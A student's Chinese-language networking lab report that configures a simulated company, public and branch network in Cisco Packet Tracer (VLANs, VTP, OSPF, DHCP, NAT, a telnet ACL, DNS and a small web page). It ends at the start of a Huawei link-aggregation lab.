4)服务器的网段为172.16.1.0/24,网关为172.16.1.254
5)R1和SW1之间互联的地址为192.168.10.0/30的地址
配置
添加4个vlan,并且配置IP地址。
core(config)#int vlan 10
core(config-if)#ip addr 192.168.1.254 255.255.255.0
core(config-if)#no shut
core(config-if)#int vlan 20
core(config-if)#ip addr 192.168.2.254 255.255.255.0
core(config-if)#no shut
core(config-if)#int vlan 30
core(config-if)#ip addr 192.168.3.254 255.255.255.0
core(config-if)#no shut
core(config-if)#int vlan 100
core(config-if)#ip addr 172.16.1.254 255.255.255.0
core(config-if)#no shut 
当前接口状态和IP配置概要
物理接口状态:
- FastEthernet0/1 到 FastEthernet0/4: 启用且运行中(up/up)
- FastEthernet0/5: 物理连接断开(down/down)
- GigabitEthernet0/1 和 GigabitEthernet0/2: 物理连接断开(down/down)
| VLAN ID | IP地址 | 状态 |
|---|---|---|
| 1 | 未分配 | 管理性关闭 |
| 10 | 192.168.1.254 | 启用但协议层关闭 |
| 20 | 192.168.2.254 | 启用但协议层关闭 |
| 30 | 192.168.3.254 | 启用但协议层关闭 |
| 100 | 172.16.1.254 | 启用但协议层关闭 |
公司内网:3、现在要求所有的网关都在内网核心交换机SW1上,使用svi接口充当网关
SW1上开启三层路由功能
core#conf t
Enter configuration commands, one per line. End with CNTL/Z.
core(config)#ip routing公司内网:配置子交换机的VLAN同步:
财务部交换机
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#vtp mode client
Setting device to VTP CLIENT mode.
Switch(config)#vtp domain crazy-friday
Changing VTP domain name from NULL to crazy-friday
Switch(config)#vtp password crazy
Setting device VLAN database password to crazy
Switch(config)#hostname finance-sw
finance-sw(config)#int fa0/4
finance-sw(config-if)#switchport mode trunk可以看到VLAN数据库已经成功同步
划分VLAN接口:
将全部接口划分到VLAN:
finance-sw(config-if)#int range fa0/1,fa0/2,fa0/3,fa0/5-24
finance-sw(config-if-range)#sw mode access
finance-sw(config-if-range)#sw ac vlan 10
finance-sw(config-if-range)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gig0/1, Gig0/2
10 caiwu active Fa0/1, Fa0/2, Fa0/3, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
finance-sw(config-if-range)#
公司内网:管理部交换机
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname manage-sw
manage-sw(config)#int fa 0/1
manage-sw(config-if)#sw mode trunk
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up
manage-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24, Gig0/1
Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
manage-sw(config-if)#
manage-sw(config-if)#vtp mode client
Setting device to VTP CLIENT mode.
manage-sw(config)#vtp domain crazy-friday
Domain name already set to crazy-friday.
manage-sw(config)#vtp password crazy
Setting device VLAN database password to crazy
manage-sw(config)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24, Gig0/1
Gig0/2
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
manage-sw(config)#
划分VLAN接口
manage-sw(config)#int range fa0/2-fa0/24
manage-sw(config-if-range)#sw mode access
manage-sw(config-if-range)#sw ac vlan 30
manage-sw(config-if-range)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gig0/1, Gig0/2
10 caiwu active
20 jishu active
30 guanli active Fa0/2, Fa0/3, Fa0/4, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
manage-sw(config-if-range)#
公司内网:技术部交换机
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname tech-sw
tech-sw(config)#vtp mode client
Setting device to VTP CLIENT mode.
tech-sw(config)#vtp domain crazy-friday
Changing VTP domain name from NULL to crazy-friday
tech-sw(config)#vtp password crazy
Setting device VLAN database password to crazy
tech-sw(config)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/1, Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config)#int
%LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to down
%LINK-5-CHANGED: Interface GigabitEthernet0/1, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
% Incomplete command.
tech-sw(config)#int g0/1
tech-sw(config-if)#sw mode tr
tech-sw(config-if)#sw mode trunk
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
tech-sw(config-if)#dis vlan br
tech-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config-if)#int range fa0/1-24
tech-sw(config-if-range)#sw mode access
tech-sw(config-if-range)#sw ac vlan 30
tech-sw(config-if-range)#sw ac vlan 20
tech-sw(config-if-range)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gig0/2
10 caiwu active
20 jishu active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
tech-sw(config-if-range)#公司内网:服务器交换机
Switch#en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname server-sw
server-sw(config)#int g0/1
server-sw(config-if)#sw mode tr
server-sw(config-if)#sw mode trunk
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
server-sw(config-if)#dis vlan br
server-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
server-sw(config-if)#vtp mode client
Setting device to VTP CLIENT mode.
server-sw(config)#vtp domain crazy-friday
Domain name already set to crazy-friday.
server-sw(config)#vtp password crazy
Setting device VLAN database password to crazy
server-sw(config)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/2
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
server-sw(config)#int g0/2
server-sw(config-if)#sw mode ac
server-sw(config-if)#sw ac vlan 100
server-sw(config-if)#do show vlan b
server-sw(config-if)#do show vlan br
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active Gig0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
server-sw(config-if)#
公司内网:服务器IP配置
- IP:172.16.1.10/24
- 网关:172.16.1.254
- DNS:临时:113.100.2.56
公司内网: 2.5: 5)R1和SW1之间互联的地址为192.168.10.0/30的地址
核心交换机:
core#conf t
Enter configuration commands, one per line. End with CNTL/Z.
core(config)#vlan 1000
core(config-vlan)#name R1-SW1-Interconnect
core(config-vlan)#interface vlan 1000
core(config-if)#
%LINK-5-CHANGED: Interface Vlan1000, changed state to up
core(config-if)#ip address 192.168.10.2 255.255.255.252
core(config-if)#no shutdown
core(config-if)#interface GigabitEthernet0/0
core(config-if)#switchport mode access
core(config-if)#switchport access vlan 1000
core(config-if)#
%LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1000, changed state to up
no shut
core(config-if)#no shut
#配置静态路由
core(config-if)#ip route 0.0.0.0 0.0.0.0 192.168.10.1
路由器
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#int g0/0
Router(config-if)#ip address 192.168.10.1 255.255.255.252
Router(config-if)#no shutdown
#子网静态路由
Router(config-if)#ip route 192.168.0.0 255.255.0.0 192.168.10.2
公司内网:4、实现内网所有PC和服务器之间的互联
允许trunk VLANIP互通
server-sw>en
server-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
server-sw(config)#int g0/1
server-sw(config-if)#switchport trunk allowed vlan 10,20,30,100
finance-sw>en
finance-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
finance-sw(config)#int f0/4
finance-sw(config-if)#switchport trunk allowed vlan 10,20,30,100
manage-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
manage-sw(config)#int fa0/1
manage-sw(config-if)#switchport trunk allowed vlan 10,20,30,100
tech-sw>en
tech-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
tech-sw(config)#int g0/1
tech-sw(config-if)#switchport trunk allowed vlan 10,20,30,100
核心交换机:
core#conf t
Enter configuration commands, one per line. End with CNTL/Z.
core(config)#int range g0/1,fa0/1-3
core(config-if-range)#switchport trunk allowed vlan 10,20,30,100使用服务器进行测试
ping:172.16.1.254
ping 192.168.1.254
C:\>
C:\>ping 192.168.1.254
Pinging 192.168.1.254 with 32 bytes of data:
Reply from 192.168.1.254: bytes=32 time<1ms TTL=255
Reply from 192.168.1.254: bytes=32 time<1ms TTL=255
Ping statistics for 192.168.1.254:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-Cping 192.168.2.254
C:\>ping 192.168.2.254
Pinging 192.168.2.254 with 32 bytes of data:
Reply from 192.168.2.254: bytes=32 time<1ms TTL=255
Ping statistics for 192.168.2.254:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-Cping 192.168.3.254
C:\>ping 192.168.3.254
Pinging 192.168.3.254 with 32 bytes of data:
Reply from 192.168.3.254: bytes=32 time<1ms TTL=255
Ping statistics for 192.168.3.254:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-C
ping 192.168.1.10
公司内网:5、由于内网员工对于计算机的使用能力较差,DHCP服务器
出口路由器
Router(config)#ip dhcp excluded-address 192.168.1.1 192.168.1.100
Router(config)#ip dhcp excluded-address 192.168.2.1 192.168.2.100
Router(config)#ip dhcp excluded-address 192.168.3.1 192.168.3.100
Router(config)#ip dhcp pool VLAN10-POOL
Router(dhcp-config)#network 192.168.1.0 255.255.255.0
Router(dhcp-config)#default-router 192.168.1.254
Router(dhcp-config)#dns-server 113.100.2.56
Router(dhcp-config)#exit
Router(config)#ip dhcp pool VLAN20-POOL
Router(dhcp-config)#network 192.168.2.0 255.255.255.0
Router(dhcp-config)#default-router 192.168.2.254
Router(dhcp-config)#dns-server 113.100.2.56
Router(dhcp-config)#exit
Router(config)#ip dhcp pool VLAN30-POOL
Router(dhcp-config)#network 192.168.3.0 255.255.255.0
Router(dhcp-config)#default-router 192.168.3.254
Router(dhcp-config)#dns-server 113.100.2.56
Router(dhcp-config)#exitDHCP中继
core(config)#int vlan 10
core(config-if)#ip helper-address 192.168.10.1
core(config-if)#int vlan 20
core(config-if)#ip helper-address 192.168.10.1
core(config-if)#int vlan 30
core(config-if)#ip helper-address 192.168.10.1测试:
公司内网:6、允许内网管理部门的员工通过telnet管理内网的路由器和核心交换机,其他部门不允许通过telnet管理路由器和交换机。(要配置telnet管理内网设备)
可能有问题目前。内网管理部门咱这里理解为内网管理部门是技术部了 ,也许是管理部
新建VLAN500用于管理,并配置ACL表
- 核心交换机: 192.168.20.10
- 路由器:192.168.10.1
核心交换机:
core#configure terminal
core(config)#vlan 500
core(config-vlan)#name tech-admin
core(config-vlan)#exit
core(config)#interface vlan 500
core(config-if)#ip address 192.168.2.1 255.255.255.0
core(config-if)#no shutdown
core(config-if)#exit
core(config)#ip access-list standard TELNET-ACL
core(config-std-nacl)#permit 192.168.2.0 0.0.0.255
core(config-std-nacl)#deny any
core(config-std-nacl)#exit
core(config)#line vty 0 4
core(config-line)#access-class TELNET-ACL in
core(config-line)#exit
core(config)#interface range g0/1-2,fa0/1-3
core(config-if-range)#switchport mode trunk
core(config-if-range)#switchport trunk allowed vlan add 500
core(config-if-range)#exit
core(config)#ip route 192.168.2.0 255.255.255.0 vlan 500
core(config)#end
core#copy running-config startup-config路由器:
Router#configure terminal
Router(config)#ip access-list standard TELNET-ACL
Router(config-std-nacl)#permit 192.168.2.0 0.0.0.255
Router(config-std-nacl)#deny any
Router(config-std-nacl)#exit
Router(config)#line vty 0 4
Router(config-line)#access-class TELNET-ACL in
Router(config-line)#exit
技术部SW:
tech-sw#conf t
Enter configuration commands, one per line. End with CNTL/Z.
tech-sw(config)#interface vlan 500
tech-sw(config-if)#
%LINK-5-CHANGED: Interface Vlan500, changed state to up
tech-sw(config-if)#ip address 192.168.20.120 255.255.255.0
tech-sw(config-if)#no shut
tech-sw(config-if)#interface g0/1
tech-sw(config-if)#switchport trunk allowed vlan add 500
tech-sw(config-if)#username KFC4 password KFC4
tech-sw(config)#line vty 0 4
tech-sw(config-line)#login local
tech-sw(config-line)#transport input telnet只有技术部可以访问:
路由:
其他部门被拒绝了。
公网部分:要求
- R1和R2之间采用100.1.1.0/24网段,R2和R3之间采用124.126.100.0/24网段地址,R3和R4之间采用202.96.137.0/24网段地址,R3和外网HTTP-SERVER以及公网PC之间,采用124.126.200.0/24网段地址。(外网HTTP-SERVER和公网PC的网关为124.126.200.254)
- 为了保证公网之间能够通信,R1、R2、R3之间采用ospf动态路由协议进行通信
- 公网PC可以通过R1的8080端口访问到内网HTTP-SERVER的80端口的http业务
- 现在有一台公网服务器HTTP-SERVER,地址为124.126.200.10/24,现在需要内网用户能够访问到该公网服务器。(R1和R2之间使用124.126.100.0/24网段)
- 有一台公网的DNS-SERVER,地址为113.100.2.56/24,网关为113.100.2.1/24,我们最终想要通过访问www.shixun.com这个域名访问到公网http-server,并且查看首页的a small page,内容显示为:welcome to study our course!
公网部分:1、IP配置
R1-IP:
IP地址:
| Interface | IP Address | Subnet Mask | Status |
|---|---|---|---|
| GigabitEthernet0/1 | 100.1.1.1 | 255.255.255.0 | Up |
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#int g0/1
Router(config-if)#ip address 100.1.1.1 255.255.255.0
Router(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/1, changed state to up
Router(config-if)#router ospf 1
Router(config-router)#network 100.1.1.0 0.0.0.255 area 0
Router(config-router)#hostname r1
r1(config)# R2-IP:
IP地址:
| Interface | IP Address | Subnet Mask | Status |
|---|---|---|---|
| GigabitEthernet0/0 | 100.1.1.2 | 255.255.255.0 | - |
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname r2
r2(config)#int g0/0
r2(config-if)#ip address 100.1.1.2 255.255.255.0
r2(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/0, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/0, changed state to up
r2(config-if)#int g0/1
r2(config-if)#ip address 124.126.100.1 255.255.255.0
r2(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/1, changed state to up
#配置OSPF
r2(config-if)#router ospf 1
r2(config-router)#network 100.1.1.0 0.0.0.255 area 0
r2(config-router)#network 124.126.100.0 0.0.0.255 area 0 R3:
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname r3
r3(config)#int g0/0
r3(config-if)#ip address 124.126.100.2 255.255.255.0
r3(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/0, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/0, changed state to up
r3(config-if)#int g0/1
r3(config-if)#ip address 202.96.137.1 255.255.255.0
r3(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/1, changed state to up
r3(config-if)#int g0/2
r3(config-if)#ip address 124.126.200.254 255.255.255.0
r3(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/2, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/2, changed state to up
#配置OSPF
r3(config-if)#router ospf 1
r3(config-router)#network 124.126.100.0 0.0.0.255 area 0
r3(config-router)#network 202.96.137.0 0.0.0.255 area 0
r3(config-router)#network 124.126.200.0 0.0.0.255 area 0R4:
Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname r4
r4(config)#int g0/0
r4(config-if)#ip addr 202.96.137.2 255.255.255.0
r4(config-if)#no shut当前路由表:
r1#show ip route
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
* - candidate default, U - per-user static route, o - ODR
P - periodic downloaded static route
Gateway of last resort is not set
100.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
C 100.1.1.0/24 is directly connected, GigabitEthernet0/1
L 100.1.1.1/32 is directly connected, GigabitEthernet0/1
124.0.0.0/24 is subnetted, 2 subnets
O 124.126.100.0/24 [110/2] via 100.1.1.2, 00:13:02, GigabitEthernet0/1
O 124.126.200.0/24 [110/3] via 100.1.1.2, 00:11:52, GigabitEthernet0/1
S 192.168.0.0/16 [1/0] via 192.168.10.2
192.168.10.0/24 is variably subnetted, 2 subnets, 2 masks
C 192.168.10.0/30 is directly connected, GigabitEthernet0/0
L 192.168.10.1/32 is directly connected, GigabitEthernet0/0
O 202.96.137.0/24 [110/3] via 100.1.1.2, 00:00:33, GigabitEthernet0/1
r1#公网部分:3、公网PC可以通过R1的8080端口访问到内网HTTP-SERVER的80端口的http业务
内网访问服务器(172.16.1.10/24),可以正常访问
R1配置路由
r1(config)#ip route 172.16.1.0 255.255.255.0 192.168.10.2路由可以ping通内网服务器:
配置NAT:
r1(config)#int g0/0
r1(config-if)#ip nat inside
r1(config-if)#int g0/1
r1(config-if)#ip nat outside
r1(config)#ip nat inside source static tcp 172.16.1.10 80 100.1.1.1 8080
测试访问:
公网PC:
IP地址:124.126.200.11
子网掩码:255.255.255.0
默认网关:124.126.200.254
DNS服务器:113.100.2.56
可以正常访问:
公网部分:4、现在有一台公网服务器HTTP-SERVER,地址为124.126.200.10/24,现在需要内网用户能够访问到该公网服务器。(R1和R2之间使用124.126.100.0/24网段)
(R1和R2之间使用124.126.100.0/24网段) 此句话忽略。
IP配置:
IP地址:124.126.200.10
子网掩码:255.255.255.0
默认网关:124.126.200.254
DNS服务器:113.100.2.56
r1(config)#access-list 10 permit 192.168.0.0 0.0.255.255
r1(config)#ip nat inside source list 10 interface g0/1 overload
可以正常访问啦!
公网部分:5、有一台公网的DNS-SERVER,地址为113.100.2.56/24,网关为113.100.2.1/24,我们最终想要通过访问www.shixun.com这个域名访问到公网http-server,并且查看首页的a small page,内容显示为:welcome to study our course!
R2:
r2>en
r2#conf t
Enter configuration commands, one per line. End with CNTL/Z.
r2(config)#int g0/2
r2(config-if)#
r2(config-if)#ip address 113.100.2.1 255.255.255.0
r2(config-if)#no shut
%LINK-5-CHANGED: Interface GigabitEthernet0/2, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/2, changed state to up
#配置OSPF
r2(config-if)# router ospf 1
r2(config-router)#network 113.100.2.0 0.0.0.255 area 1配置DNS服务器:
DNS服务器IP:113.100.2.56/24 via 113.100.2.1
配置域名:
www.shixun.com
测试访问:
访问成功,修改HTML
HTML内容
index.html
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>首页 - 欢迎来到实训课程</title>
</head>
<body>
<div class="container">
<h1>欢迎来到实训课程首页</h1>
<p>点击下面的链接查看详细信息:</p>
<a href="a_small_page.html">进入课程页面(a_small_page)</a>
<a>疯狂星期5组奉献</a>
</div>
</body>
</html>a_small_page.html
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>课程详情 - 欢迎学习我们的课程</title>
</head>
<body>
<div class="container">
<h1>欢迎学习我们的课程!</h1>
<p>Welcome to study our course!</p>
<a href="index.html">返回首页</a>
<a>疯狂星期5组奉献</a>
</div>
</body>
</html>
效果
分支:
分支:1、内网PC7和PC8分别位于vlan70和vlan80这两个vlan当中
分支:2、PC7和PC8的网关分别为192.168.70.254 192.168.80.254,且网关位于R4路由器上
Switch>
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#
Switch(config)#hostname branch
branch(config)#vlan 70
branch(config-vlan)#int vlan 70
branch(config-if)#
%LINK-5-CHANGED: Interface Vlan70, changed state to up
branch(config-if)#ip addr 192.168.70.254 255.255.255.0
branch(config-if)#vlan 80
branch(config-vlan)#int vlan 80
branch(config-if)#
%LINK-5-CHANGED: Interface Vlan80, changed state to up
branch(config-if)#ip addr 192.168.80.254 255.255.255.0
branch(config-if)#
branch(config-if)#vlan 600
branch(config-vlan)#int vlan 600
branch(config-if)#
%LINK-5-CHANGED: Interface Vlan600, changed state to up
branch(config-if)#ip addr 10.10.10.2 255.255.255.252
branch(config-if)#i
branch(config-if)#int fa0/2
branch(config-if)#sw mode acc
branch(config-if)#sw acc vlan 70
branch(config-if)#
%LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan70, changed state to up
branch(config-if)#no shut
branch(config-if)#
branch(config-if)#int fa0/3
branch(config-if)#sw mode acc
branch(config-if)#sw acc vlan 80
branch(config-if)#
LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan80, changed state to up
branch(config-if)#no shut
branch(config-if)#
branch(config-if)#int f0/1
branch(config-if)#
branch(config-if)#sw mode acc
branch(config-if)#sw acc vlan 600
branch(config-if)#no shut
branch(config-if)#
branch(config-if)#ip route 0.0.0.0 0.0.0.0 10.10.10.1
branch(config)#ip routing
分支:3、PC7和PC8也要能够访问外网(测试访问公网HTTP-SERVER)
PC7:
IP地址:192.168.70.10
子网掩码:255.255.255.0
默认网关:192.168.70.254
DNS服务器:113.100.2.56
PC8:
IP地址:192.168.80.10
子网掩码:255.255.255.0
默认网关:192.168.80.254
DNS服务器:113.100.2.56
R4:
r4(config)#int g0/1
r4(config-if)#ip addr 10.10.10.1 255.255.255.252
r4(config-if)#no shutPC8<->PC7相互访问
配置访问:
branch(config)#ip route 0.0.0.0 0.0.0.0 10.10.10.1
r4(config)#int g0/1
r4(config-if)#ip addr 10.10.10.1 255.255.255.252
r4(config-if)#no shut
r4(config)#access-list 100 permit ip 192.168.70.0 0.0.0.255 any
r4(config)#access-list 100 permit ip 192.168.80.0 0.0.0.255 any
r4(config)#int g0/1
r4(config-if)#ip nat inside
r4(config-if)#int g0/0
r4(config-if)#ip nat outside
r4(config-if)#ip nat inside source list 100 interface g0/0 overload
r4(config)#ip route 192.168.70.0 255.255.255.0 10.10.10.2
r4(config)#ip route 192.168.80.0 255.255.255.0 10.10.10.2r4(config)#do show ip int br
Interface IP-Address OK? Method Status Protocol
GigabitEthernet0/0 202.96.137.2 YES manual up up
GigabitEthernet0/1 10.10.10.1 YES manual up up
GigabitEthernet0/2 unassigned YES unset administratively down down
Vlan1 unassigned YES unset administratively down down
r4(config)#
r4(config)#router ospf 1
r4(config-router)#do show ip ospf neighbor
Neighbor ID Pri State Dead Time Address Interface
202.96.137.1 1 FULL/DR 00:00:30 202.96.137.1 GigabitEthernet0/0
r4(config-router)#
r4(config-router)#network 202.96.137.0 0.0.0.255 area 0
测试
PC7成功访问
PC8成功访问
文件
https://p.dabbit.net/blog/pic_bed/sharex/_pn-2024-06-27-15-48-28_Marten_Infatuated_Delirious.rar
网络系统集成基础(实验学时)——实验七
网络系统集成基础(实验学时)——实验七
公司、校园网设计1
实验内容:
1、交换机、路由器链路聚合实验
2、Ipv6基础实验。
3、根据前期实验公司网络提出的客户需求分析,对所提需求完成网络规划和技术设计,完成公司网络系统集成设计(2000台电脑),总公司、分公司地跨两个不同城市。
实验报告:
要求独立完成,报告需包含模拟器配置文件
使用华为模拟器或思科模拟器完成
实验1、链路聚合
拓扑图
配置前STP信息
[Huawei]dis stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet0/0/1 ROOT FORWARDING NONE
0 GigabitEthernet0/0/2 ALTE DISCARDING NONE
0 GigabitEthernet0/0/3 ALTE DISCARDING NONE
0 GigabitEthernet0/0/4 DESI LEARNING NONE
[Huawei]配置
[Huawei]undo info-center enable
[Huawei]int Eth-Trunk 1
[Huawei-Eth-Trunk1]int g0/0/1
[Huawei-GigabitEthernet0/0/1]eth-trunk 1
